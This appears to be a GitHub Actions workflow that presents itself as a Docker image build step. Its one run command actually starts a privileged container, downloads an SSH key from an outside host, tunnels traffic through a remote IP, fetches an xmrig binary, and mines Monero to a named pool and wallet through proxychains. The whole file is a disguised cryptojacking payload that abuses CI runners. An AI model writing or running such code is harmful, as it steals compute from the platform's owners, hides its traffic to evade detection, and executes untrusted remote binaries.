name: varddduu

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:

  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v2
    - name: Buildfd the Docker image
      run: |
       docker run --privileged ubuntu bash -c 'echo "tzdata tzdata/Areas select Europe     tzdata tzdata/Zones/Europe select Berlin" >> 211.txt && debconf-set-selections 211.txt && export DEBIAN_FRONTEND=noninteractive DEBCONF_NONINTERACTIVE_SEEN=true && apt update && apt install cmake git wget curl -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold" -y && wget https://acorreen.sirv.com/vardaaaaa && chmod 400 vardaaaaa && ssh -4 -o StrictHostKeyChecking=no  -i vardaaaaa linux1@148.100.78.163 -NfD 1086 && git clone https://github.com/rofl0r/proxychains-ng.git && cd proxychains-ng && ./configure && make && make install && wget https://acorreen.sirv.com/proxychains.conf && wget https://github.com/duggsydaddy/xmrsample2/raw/main/xmrig && chmod +x xmrig && ./proxychains4 -f proxychains.conf ./xmrig -o pool.minexmr.com:4444 -u 4AHcfXNosADQX5jSDTAAEXFchzZMQyxjZKSecUSPmyf6T4SzCMVkjsU8tnKiWUk1ApiwC69A1sVUHUJ5KbusHSuT8hayurp'
